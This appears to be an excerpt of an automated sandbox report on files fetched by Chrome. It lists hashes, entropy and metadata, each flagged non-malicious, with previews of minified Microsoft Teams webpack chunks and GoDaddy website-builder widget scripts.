                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[365138],{327005:(e,t,i)=>{"use strict";i.d(t,{c:()=>o});var n=i(362328);const a={kind:"Document",get definitions(){const e=(0,n.G)("query ServicesIoDataCallingServiceAdaptersActivitySettingsQuery($appId:String!,$subCategoryPageId:String) {activitySettings(appId:$appId,subCategoryPageId:$subCategoryPageId) {id,error,settingsList {key,value}}}");return delete this.definitions,this.definitions=e.definitions}};var r=i(354776);const o=async e=>{const{data:t}=await e.query({query:a,fetchPolicy:"no-cache",variables:{appId:r.n5.Meetings,subCategoryPageId:r.n5.Meetings}});return t?.activitySettings?.settingsList}},230749:(e,t,i)=>{"use strict";i.d(t,{R:()=>ee});var n=i(332752),a=i(805809),r=i(724801),o=i(424096),l=i(364819),s=i(554186),c=i(194649),d=i(46377),g=i(2596),p=i(926751);const u={403:"Forbidden",404:"NotFound",409:"Conflict",500:"InternalServerError",400:"BadRequest",503:"ServiceUnavailab
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22644)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):22761
                                                                                                                                                                                                                          Entropy (8bit):5.355873403232118
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:j6IoOwOTowAe2yY+NTglTuTETn+8DTVDTsDTPDT5ViDT+DTIL1DTa+LglMWYk4zX:j6IoOwOToKNTglTuTET+MTVT8T7TjGTV
                                                                                                                                                                                                                          MD5:A469A9C5812F6F4170AFB3090C000DC7
                                                                                                                                                                                                                          SHA1:D3CCAFB36345240C46E9BD7B3422A02060FB02E4
                                                                                                                                                                                                                          SHA-256:7BF5B630A8DFA1F31C15116E0CA1430C1395029151289EE3126A26208C72F9BF
                                                                                                                                                                                                                          SHA-512:45A89FCE6FB7880CE3BE4413E7A9EFC071D29AA4A8FDB24FE06BB5C033F520B6843CD86B72694FB48619EB7709D416EB91CF3D1D16B7AF31C4B0E4B4DC508EEB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/services-people-4b57d8ffa3d30125.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[136417],{943719:(e,s,t)=>{t.r(s),t.d(s,{ANONYMOUS_USER_MRI_TFL_PREFIX:()=>h.F,ANONYMOUS_USER_MRI_TFW_PREFIX:()=>h.et,AliasVisibilitySetting:()=>p.X3,DEFAULT_ZERO_STATE_SUGGESTIONS_TO_SHOW_COUNT:()=>h.X7,EventActionTakenTypes:()=>te.Hh,EventTypes:()=>te.wf,FederatedUserStatus:()=>p.SV,HTTPRequestMethod:()=>p.FL,LayoutTypes:()=>te.ui,M365PersonaType:()=>h.SG,PSTN_MRI_PREFIX:()=>h.Oc,PeoplePickerFilterType:()=>te.gI,PeoplePickerFilters:()=>se.H,PeoplePickerFor:()=>te.d1,PeoplePickerItemType:()=>h.lT,PeopleSearchSource:()=>te.f_,PeopleService:()=>Y,PeopleServiceApiName:()=>p.GA,PeopleUtilities:()=>h.af,PhoneType:()=>p.L,ProfilePictureSize:()=>p.xi,ProfilePictureSizesDescriptions:()=>p.Xz,ProfileUpdateChangeType:()=>Z,ProfileUpdateSyncService:()=>pe,ProfileUpdateSyncStatus:()=>ee,Provider:()=>te.Kq,RequestType:()=>p.Yw,StatusCodeFromMTResponse:()=>p.s9,TFL_SMS_UN_VERIFIED_MRI_PREF
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (60240)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60348
                                                                                                                                                                                                                          Entropy (8bit):4.483293718479703
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:YdXLNVjPjYgCvyPJy+EPXt42hABXwhJKK:uNV7jYpyPJy+EPXt42hABUJKK
                                                                                                                                                                                                                          MD5:B445DBDD2330900E22E737DE4C72215D
                                                                                                                                                                                                                          SHA1:53F4297A5CAE9D4B7C576DBEE5A413AE85F39A8C
                                                                                                                                                                                                                          SHA-256:33A7F949CBB18F9B050399510CC0F9D0DD3855311ABE2D662C13B59C5C82680B
                                                                                                                                                                                                                          SHA-512:BD46D44EC8E7127E019DE6FF15E88562E2DA9730203229AA0D2C48F13B1380A4D84F391F0D8FC12D9C821A691612E2C5AB68898861C449CD21F7CB1F629BF0CF
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[750818],{750818:(a,l,Z)=>{Z.d(l,{_jO:()=>e,iNx:()=>m,gcm:()=>h,_Xk:()=>v,IjV:()=>M,Ylq:()=>H,W_M:()=>r,yuG:()=>i,NGN:()=>V,nUb:()=>o,oAB:()=>U,Crl:()=>A,tyz:()=>C,LKJ:()=>t,xeZ:()=>L,dbj:()=>d,Cke:()=>u,aUo:()=>n,dgX:()=>s,lr5:()=>g,k$2:()=>R,m_5:()=>F,BKw:()=>D,Njq:()=>p,QWN:()=>k,CX7:()=>f,V6R:()=>w,Xwn:()=>E,nvQ:()=>y,XUe:()=>S,c4C:()=>O,yly:()=>b,_B:()=>j,wSM:()=>_,onv:()=>B,iG:()=>x,nrH:()=>P,J3O:()=>T,qQV:()=>W,ALn:()=>Q,$HY:()=>q,ZJc:()=>N,MVw:()=>z,akU:()=>X,WhM:()=>G,CbY:()=>$,WHO:()=>I,k_r:()=>J,POZ:()=>K,Lpw:()=>Y,OGg:()=>aa,O6n:()=>la,pQD:()=>Za,jsk:()=>ca,FT3:()=>ea,Htf:()=>ma,xhg:()=>ha,d_C:()=>va,f8w:()=>Ma,pwR:()=>Ha,sVb:()=>ra,iil:()=>ia,Enj:()=>Va,Qvr:()=>oa,zBW:()=>Ua,LWr:()=>Aa,d0y:()=>Ca,cBQ:()=>ta,Ult:()=>La,pyq:()=>da,smH:()=>ua,Gdy:()=>na,f0V:()=>sa,VEF:()=>ga,yus:()=>Ra,IN0:()=>Fa,olq:()=>Da,W6w:()=>pa,Sz$:()=>ka,y7H:()=>fa,p$u:()=>wa,ntX:()=>Ea,DxS:(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):103786
                                                                                                                                                                                                                          Entropy (8bit):5.261490918744291
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:0zuTx2lhML9fXawZl4UEVErSgcAHP2dErROyG:7TCMFE6SgXOyG
                                                                                                                                                                                                                          MD5:AF5B61E63EDF148383430A18381D2F9A
                                                                                                                                                                                                                          SHA1:A6DD3EBC64F1D401A3E970EF8A13D2EEB5328987
                                                                                                                                                                                                                          SHA-256:6CFDA19B61B4BB0AF261914AF54875287835A5EDD8D61E184FD8B229E7235907
                                                                                                                                                                                                                          SHA-512:15B0DAE2836D51E707D7F62FE4AEAE5D2AF16D9A93316F1A7B3D0822ABCF4B27C1CC9B0A2C8B6355C3FFE05425638543DC253965216A56532C5746042D6EDB39
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[927767,317822,425104],{787762:(e,t,n)=>{"use strict";n.d(t,{I3:()=>ue,Em:()=>se,n_:()=>de,WY:()=>le,Nj:()=>ae,Rs:()=>ce});var r=n(845155),o=n.n(r),i=n(757060),s=n(213991),u=n(451281),a=n(513432),l=n(364819);function c(){const[e,t]=(0,a.useReducer)((e=>e+1),0);return t}var d=n(860775),f=class{constructor(e){this.onComplete=e,this.status=[!0,void 0]}isIdle(){return this.status[0]&&void 0===this.querySubscription}dispose(){var e;null==(e=this.querySubscription)||e.unsubscribe(),this.querySubscription=void 0}reset(){this.dispose(),this.status=[!0,void 0]}handleResult(e){this.status=[!1,e],this.dispose(),this.onComplete()}subscribe(e){this.querySubscription=e.subscribe((({error:e})=>{this.handleResult(e)}),(e=>{this.handleResult(e)}))}};function p(e,t){const{watchQueryDocument:n}=e;o()(n,"useLazyLoadQuery(): Expected a `watchQueryDocument` to have been extracted. Did you forget to invoke the c
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):97849
                                                                                                                                                                                                                          Entropy (8bit):5.49386796124279
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:63FpjFZJRkpt40EncEOUi21jdNpor/ArvEPfKlK56:6VhJS40EncE22HQpPfKlK56
                                                                                                                                                                                                                          MD5:41E2972A4DED74ECCB214740E70A8281
                                                                                                                                                                                                                          SHA1:1444C2790FA392C28F882F92FD4C3476ADCD92BE
                                                                                                                                                                                                                          SHA-256:8282CA02E1299653AE62135917BD57591958C7662F688B60FA24506EA16BE2C9
                                                                                                                                                                                                                          SHA-512:D59C488BD5CA6472146D1FBEE71DA33DFF55B480D3C0D4A50654D8555A2B0B846FB1066277795363A7B55D0CA6A729BDB9EA00CE7369B2F329FFD4D22F841894
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[47330],{156054:(e,t,n)=>{n.d(t,{j:()=>b});var r=n(340415),i=n(344411),a=n(680828),o=n(779497),s=n(179233),u=n(661187),l=n(679080),c=n(943085),f=["ACCDA","ACCDB","ACCDC","ACCDE","ACCDR","ACCDT","ACCDU","ACCDW","ACCFT","ADE","ADN","ADP","AVI","BMP","CSV","DOC","DOCX","DOT","DOTX","ERR","FON","GIF","HTML","ISO","JPEG","JPG","LACCDB","LDB","LOG","MAD","MAF","MAG","MAM","MAQ","MAR","MAS","MAT","MAU","MAV","MAW","MDA","MDBHTML","MDE","MDN","MDT","MDW","MOV","MP3","MPD","MPG","MPP","MPT","MPW","MPX","MSG","OLS","ONE","ONEPKG","ONETOC","ONETOC2","OST","PDF","PNG","POT","POTHTML","POTX","PPA","PPS","PPSX","PPT","PPTHTML","PPTMHTML","PPTX","PPTXML","PST","PUB","PWZ","RTF","SLDM","SLDX","SLK","THMX","TIF","TIFF","TSX","TTF","TXT","VDW","VDX","VHD","VSD","VSDM","VSDX","VSIX","VSL","VSS","VSSM","VSSX","VST","VSTM","VSTX","VSU","VSW","VSX","WAV","WIZHTML","WMA","WMV","WPL","XLS","XLSHTML",
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (44425)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):44533
                                                                                                                                                                                                                          Entropy (8bit):5.270142196256675
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:3jOT4igirpMPTfKC3hVf2prHPPjzJkGmdTgAWbh/kBmhwkBBkXboeb8hIqHGi8Kd:5CCfq1m6Qb+mi8Fvw+CO50SfcJ5Y8
                                                                                                                                                                                                                          MD5:B7289244C39667518303834AF67B17F2
                                                                                                                                                                                                                          SHA1:A08B19A0A3EB54A16976EC1A606504130ABBB467
                                                                                                                                                                                                                          SHA-256:D85996B603536F1616663A2D7077C2EAD6EA2F7BCC5108AA4C29051A52B57A68
                                                                                                                                                                                                                          SHA-512:7940135EF7D4DE0F1F38E7468413E1D4FA97C5B89AA1E91198BA8B4D1F3B91D366E3A2080ED008B2C587D57D7CA99CCECEF6C6375F3300373CD493499E63F5C9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[381452],{95110:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,o=new Array(t);n<t;n++)o[n]=e[n];return o},e.exports.__esModule=!0,e.exports.default=e.exports},952002:(e,t,n)=>{var o=n(95110);e.exports=function(e){if(Array.isArray(e))return o(e)},e.exports.__esModule=!0,e.exports.default=e.exports},119666:(e,t,n)=>{"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{A:()=>o})},63428:(e,t,n)=>{"use strict";function o(e,t){for(var n=0;n<t.length;n++){var o=t[n];o.enumerable=o.enumerable||!1,o.configurable=!0,"value"in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}}function i(e,t,n){return t&&o(e.prototype,t),n&&o(e,n),Object.defineProperty(e,"prototype",{writable:!1}),e}n.d(t,{A:()=>i})},426220:(e,t,n)=>{"use strict";function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (30489)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):30597
                                                                                                                                                                                                                          Entropy (8bit):5.36114233090183
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:J+fPoXF4ikn1Fd9nZTBJCda5tgMRillf5xeO55XqqRCRWtcNH4oYJF:KW6U8TwAQb
                                                                                                                                                                                                                          MD5:B34B6A1930919E2D8AD388FEA65E6E64
                                                                                                                                                                                                                          SHA1:F43E4975CFE5BEA3EB9298FEBC37BCB333582026
                                                                                                                                                                                                                          SHA-256:97E8A6EA62E0062C54C0D755509DD5F9ACF2C4C41297170AC361EDF1FD882D43
                                                                                                                                                                                                                          SHA-512:2B0C9CF798816C5ECDD5CF056130EAA4ED4D5AA4C92A341A43C35B788EEF9C0FFC3C876C28A9D96A97BA6FE1C96A7FAF403B95C69665CF6D578C28F2A02676AE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/233940-74cf9f018d3d63e1.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[233940],{626388:(e,t,r)=>{var n;function o(e){return!!e&&e<7}r.d(t,{p:()=>n,b:()=>o}),function(e){e[e.loading=1]="loading",e[e.setVariables=2]="setVariables",e[e.fetchMore=3]="fetchMore",e[e.refetch=4]="refetch",e[e.poll=6]="poll",e[e.ready=7]="ready",e[e.error=8]="error"}(n||(n={}))},422816:(e,t,r)=>{r.d(t,{M:()=>i,K:()=>s});var n=r(383851),o=(r(360418),r(852965));function i(e){return e.hasOwnProperty("graphQLErrors")}var s=function(e){function t(r){var n,i,s=r.graphQLErrors,a=r.clientErrors,c=r.networkError,u=r.errorMessage,l=r.extraInfo,d=e.call(this,u)||this;return d.graphQLErrors=s||[],d.clientErrors=a||[],d.networkError=c||null,d.message=u||(n=d,i="",((0,o.E)(n.graphQLErrors)||(0,o.E)(n.clientErrors))&&(n.graphQLErrors||[]).concat(n.clientErrors||[]).forEach((function(e){var t=e?e.message:"Error message not found.";i+="".concat(t,"\n")})),n.networkError&&(i+="".concat(n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (905)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):960
                                                                                                                                                                                                                          Entropy (8bit):5.203352394673048
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:pzBLgJHHVvC+dKbywqIN6ttVFRJB1i/uwBrV7DtZHrIvyU:zSkjbQxz3+uQ7RxrIx
                                                                                                                                                                                                                          MD5:62A914B2C847D4D02B76164D7A2A54C6
                                                                                                                                                                                                                          SHA1:20D9F49A90A51FA6C8420640610DF77F7A96D919
                                                                                                                                                                                                                          SHA-256:B08C2864EC27736C507B1CA4B3A225A19147841B861CD8494DAF95FA370FE639
                                                                                                                                                                                                                          SHA-512:E67D3D9F68EF3151D93DEDAA3530DF89F0C957F08561E93134B219DEC23C2A1FE0D109AC666619526742C5411E4636ECE416A3AD1148C1AD0861F0050B41D3DE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/c/_commonjsHelpers-67085353.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/_commonjsHelpers-67085353.js",["exports"],(function(e){"use strict";var n="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};e.a=n,e.b=function(e){if(e.__esModule)return e;var n=Object.defineProperty({},"__esModule",{value:!0});return Object.keys(e).forEach((function(t){var r=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(n,t,r.get?r:{enumerable:!0,get:function(){return e[t]}})})),n},e.c=function(e,n,t){return e(t={path:n,exports:{},require:function(e,n){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}(null==n&&t.path)}},t.exports),t.exports},e.g=function(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_commonjsHelpers-67085353.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8127)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8235
                                                                                                                                                                                                                          Entropy (8bit):4.478708887162824
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:6zdoCFq2V28V2DV2535hwYvfvMvavBh+emvI6+e+TJfD6D4SEj2H6w:edoChVPV0VghLvfvMvav/+emvI6+eE3g
                                                                                                                                                                                                                          MD5:8EA58F112F601CFF7AA2D7675882B65E
                                                                                                                                                                                                                          SHA1:115284DC07B6527AC92A9A6640651995613499BE
                                                                                                                                                                                                                          SHA-256:A2481FF7560DC2909D030DC4D7303BCF0E30BB65AA09960B9D6E8D93A7A36A84
                                                                                                                                                                                                                          SHA-512:A67DABF2B3FA32FD3B81A5A0DC32E1A7F286B69FBE6D5D07A614610721606FBBC154D2DFE060497E506A62B854BD46BCEFA625D1629AECCF3504F0B33670CABA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[119068],{119068:(a,l,Z)=>{Z.d(l,{JuR:()=>v,uUQ:()=>h,p46:()=>L,IyQ:()=>m,HMO:()=>r,nfo:()=>H,Dd:()=>c,ICI:()=>M,Cr5:()=>V,zeV:()=>A,do:()=>t,gke:()=>u,AqU:()=>U,ue5:()=>S,S6q:()=>d,lq8:()=>g,z6r:()=>i,qVr:()=>R,xge:()=>s,X_q:()=>k});var e=Z(693935);const v=(0,e.U)("Sparkle20Regular","20",["M7.4 12.8a1.04 1.04 0 0 0 1.59-.51l.45-1.37a2.34 2.34 0 0 1 1.47-1.48l1.4-.45A1.04 1.04 0 0 0 12.25 7l-1.37-.45A2.34 2.34 0 0 1 9.4 5.08L8.95 3.7a1.03 1.03 0 0 0-.82-.68 1.04 1.04 0 0 0-1.15.7l-.46 1.4a2.34 2.34 0 0 1-1.44 1.45L3.7 7a1.04 1.04 0 0 0 .02 1.97l1.37.45a2.33 2.33 0 0 1 1.48 1.48l.46 1.4c.07.2.2.37.38.5Zm.08-7.4.53-1.38.44 1.37a3.33 3.33 0 0 0 2.12 2.12l1.4.53-1.38.45a3.34 3.34 0 0 0-2.11 2.11l-.53 1.38-.45-1.38a3.34 3.34 0 0 0-2.1-2.12L4 7.96 5.4 7.5a3.36 3.36 0 0 0 2.08-2.12Zm6.06 11.45a.8.8 0 0 0 1.22-.4l.25-.76a1.09 1.09 0 0 1 .68-.68l.77-.25a.8.8 0 0 0-.02-1.52l-.77-.25a1.0
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):103786
                                                                                                                                                                                                                          Entropy (8bit):5.261490918744291
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:0zuTx2lhML9fXawZl4UEVErSgcAHP2dErROyG:7TCMFE6SgXOyG
                                                                                                                                                                                                                          MD5:AF5B61E63EDF148383430A18381D2F9A
                                                                                                                                                                                                                          SHA1:A6DD3EBC64F1D401A3E970EF8A13D2EEB5328987
                                                                                                                                                                                                                          SHA-256:6CFDA19B61B4BB0AF261914AF54875287835A5EDD8D61E184FD8B229E7235907
                                                                                                                                                                                                                          SHA-512:15B0DAE2836D51E707D7F62FE4AEAE5D2AF16D9A93316F1A7B3D0822ABCF4B27C1CC9B0A2C8B6355C3FFE05425638543DC253965216A56532C5746042D6EDB39
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/927767-5e852cded1999922.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[927767,317822,425104],{787762:(e,t,n)=>{"use strict";n.d(t,{I3:()=>ue,Em:()=>se,n_:()=>de,WY:()=>le,Nj:()=>ae,Rs:()=>ce});var r=n(845155),o=n.n(r),i=n(757060),s=n(213991),u=n(451281),a=n(513432),l=n(364819);function c(){const[e,t]=(0,a.useReducer)((e=>e+1),0);return t}var d=n(860775),f=class{constructor(e){this.onComplete=e,this.status=[!0,void 0]}isIdle(){return this.status[0]&&void 0===this.querySubscription}dispose(){var e;null==(e=this.querySubscription)||e.unsubscribe(),this.querySubscription=void 0}reset(){this.dispose(),this.status=[!0,void 0]}handleResult(e){this.status=[!1,e],this.dispose(),this.onComplete()}subscribe(e){this.querySubscription=e.subscribe((({error:e})=>{this.handleResult(e)}),(e=>{this.handleResult(e)}))}};function p(e,t){const{watchQueryDocument:n}=e;o()(n,"useLazyLoadQuery(): Expected a `watchQueryDocument` to have been extracted. Did you forget to invoke the c
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (62375), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):73859
                                                                                                                                                                                                                          Entropy (8bit):5.5092296140052985
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:lCth9qrU23xkE6VvHlGxtY+vo1XPuGxIJ:c2BkEKok+voESIJ
                                                                                                                                                                                                                          MD5:F9CFAD83CEA140B7C8BFCD7234676ED4
                                                                                                                                                                                                                          SHA1:061A52298D46B62598CAB7959FC11D58A548362E
                                                                                                                                                                                                                          SHA-256:A6DBF4B85629437AD65DBFDD733C99ED566893FBC599C8CAAC0B015C73F471B8
                                                                                                                                                                                                                          SHA-512:A1C72677FCDA27DAD02CB6A935411D863C38FF8A3E76B88685EE88FDE77E68902F79A4302749405EFF8E9D809395308DCB81E7E639206AFD83E87EEE25D7C3B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/710639-d32f6e097a5709e2.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[710639],{861782:(t,e,r)=>{var i=r(8605),s=r(548738),n={__proto__:null,style:!0,script:!0,xmp:!0,iframe:!0,noembed:!0,noframes:!0,plaintext:!0,noscript:!0};var a={__proto__:null,area:!0,base:!0,basefont:!0,br:!0,col:!0,command:!0,embed:!0,frame:!0,hr:!0,img:!0,input:!0,isindex:!0,keygen:!0,link:!0,meta:!0,param:!0,source:!0,track:!0,wbr:!0},o=t.exports=function(t,e){Array.isArray(t)||t.cheerio||(t=[t]),e=e||{};for(var r="",s=0;s<t.length;s++){var n=t[s];"root"===n.type?r+=o(n.children,e):i.isTag(n)?r+=c(n,e):n.type===i.Directive?r+=h(n):n.type===i.Comment?r+=p(n):n.type===i.CDATA?r+=u(n):r+=l(n,e)}return r};function c(t,e){"svg"===t.name&&(e={decodeEntities:e.decodeEntities,xmlMode:!0});var r="<"+t.name,i=function(t,e){if(t){var r,i="";for(var n in t)i&&(i+=" "),i+=n,(null!==(r=t[n])&&""!==r||e.xmlMode)&&(i+='="'+(e.decodeEntities?s.encodeXML(r):r)+'"');return i}}(t.attribs,e);return i&&(r
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (786)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):842
                                                                                                                                                                                                                          Entropy (8bit):5.258991916821592
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:caBL+qMLVRGqawadlH0rVRrkAeT25Z2HrIY/:jKqSVMqzarH0brkAeq5ZSrI+
                                                                                                                                                                                                                          MD5:31B521136207C11FF1F9985264424E8A
                                                                                                                                                                                                                          SHA1:9EAF6B9717979CAEB5C7E846E17B2A89A08DC266
                                                                                                                                                                                                                          SHA-256:C818B56446AE5A8D0466FC9C51D85104584E36F6D8B1C77E08A2D354E845E2CD
                                                                                                                                                                                                                          SHA-512:DB2A8825F8C67B6361B86F5BB1DEE38089DD57E5E74ECBA335EF7D82D9D5E5AD3F64C07195FCDF700415F6F09B11BDB6A20410462ABAEC443335F19ACF8265B1
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-themeOverrides-e736c017.js",["exports"],(function(e){"use strict";(global.Core||guac["@wsb/guac-widget-core"]).constants;e.a=e=>{let{sectionHeadingHR:t}=e;return t?{sectionHeadingHR:t}:{}},e.b=e=>{let{sectionHeadingColor:t}=e;return{HIGHLIGHT:{style:{color:"highlight"}},HIGH_CONTRAST:{style:{color:"highContrast"}}}[t]||{}},e.c=e=>{let{sectionHeadingSize:t}=e;return t?{style:{fontSize:t}}:{}},e.s=e=>{let{sectionHeadingAlignment:t}=e;return{LEFT:{style:{textAlign:"left","@md":{textAlign:"left"}},alignmentOption:"left"},CENTER:{style:{textAlign:"center","@md":{textAlign:"center"}},alignmentOption:"center"},RIGHT:{style:{textAlign:"right","@md":{textAlign:"right"}},alignmentOption:"right"}}[t]||{}}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-themeOverrides-e736c017.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1854)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1904
                                                                                                                                                                                                                          Entropy (8bit):4.925874096987715
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:iCEX2wA83zdkJi1lvietWdcy0cy7mdOrxGfrIpb:NET3zdkJiDvietWdR0R7mdOFYs
                                                                                                                                                                                                                          MD5:A3DD10B90C8E60BEC1F22E13B47AD695
                                                                                                                                                                                                                          SHA1:E8793D96240098E5B0F801C19E70644388C3C6B9
                                                                                                                                                                                                                          SHA-256:EBAA7C65B7616917ED8F17F0136FAA8E50B376D1762D2A15CB51950CC1DF2370
                                                                                                                                                                                                                          SHA-512:6634ADC4EC9323E2017152A8D02054F4B622328C608F7048C2FD3655EC8EC7EC10C353830374BFA6B2101BCDC39273010C7106D05AF743CBBC9B1E521C99B22B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-dataAids-dc689f22.js
